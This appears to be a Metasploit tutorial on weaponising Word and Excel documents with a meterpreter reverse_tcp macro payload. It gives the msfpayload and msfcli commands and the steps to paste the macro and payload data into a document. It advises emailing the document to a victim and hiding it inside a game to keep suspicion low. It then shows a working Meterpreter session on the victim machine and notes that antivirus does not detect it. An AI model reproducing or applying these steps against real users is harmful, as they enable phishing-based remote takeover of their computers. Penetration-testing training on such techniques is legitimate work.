Metasploit has a couple of built in methods you can use to infect Word and Excel documents with malicious Metasploit payloads. You can also use your own custom payloads as well. It doesn't necessarily need to be a Metasploit payload.
This method is useful when going after client-side attacks and could also be potentially useful if you have to bypass some sort of filtering that does not allow executables and only permits documents to pass through. To begin, we first need to create our VBScript payload.
root@bt4: # msfpayload windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8080 ENCODING=shikata_ga_nai V
'Created by msfpayload (http://www.metasploit.com).
' Length: 290
'* This code is now split into two pieces:
'* 1. The Macro. This must be copied into the Office document
'* macro editor. This macro will run on startup.
'* 2. The Data. The hex dump at the end of this output must be
'* appended to the end of the document contents.
As the output message, indicates, the script is in 2 parts. The first part of the script is created as a macro and the second part is appended into the document text itself. You will need to transfer this script over to a machine with Windows and Office installed and perform the following:
In Word or Excel 2003, go to Tools, Macros, Visual Basic Editor, if you're using Word/Excel 2007, go to View Macros, then place a name like "moo" and select "create".
This will open up the visual basic editor. Paste the output of the first portion of the payload script into the editor, save it and then paste the remainder of the script into thel word document itself. This is when you would perform the client-side attack by emailing this Word document to someone.
In order to keep user suspicion low, try embedding the code in one of the many Word/Excel games that are available on the Internet. That way, the user is happily playing the game while you are working in the background. This gives you some extra time to migrate to another process if you are using Meterpreter as a payload.
Here we give a generic name to the macro.
Before we send off our malicious document to our victim, we first need to set up our Metasploit listener.
root@bt4:# msfcli exploit/multi/handler PAYLOAD=windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=8080 E Please wait while we load the module tree...
| | _) |
__ `__ \ _ \ __| _` | __| __ \ | _ \ | __|
| | | __/ | ( |\__ \ | | | ( | | |
_| _| _|\___|\__|\__,_|____/ .__/ _|\___/ _|\__|
Started reverse handler on 192.168.1.101:8080
=[ metasploit v3.5.1-dev [core:3.5 api:1.0]
+ -- --=[ 677 exploits - 332 auxiliary
+ -- --=[ 215 payloads - 27 encoders - 8 nops
=[ svn r11153 updated today (2010.11.25)
PAYLOAD => windows/meterpreter/reverse_tcp
LHOST => 192.168.1.101
LPORT => 8080
Starting the payload handler...
Now we can test out the document by opening it up and check back to where we have our Metasploit exploit/multi/handler listener:
Sending stage (749056 bytes) to 192.168.1.150
Meterpreter session 1 opened (192.168.1.101:8080 -> 192.168.1.150:52465) at Thu Nov 25 16:54:29 -0700 2010
meterpreter > sysinfo
OS : Windows 7 (Build 7600, ).
Arch : x64 (Current Process is WOW64)
meterpreter > getuid
Server username: xen-win7-prod\dookie
Success! We have a Meterpreter shell right to the system that opened the document, and best of all, it doesn't get picked up by anti-virus!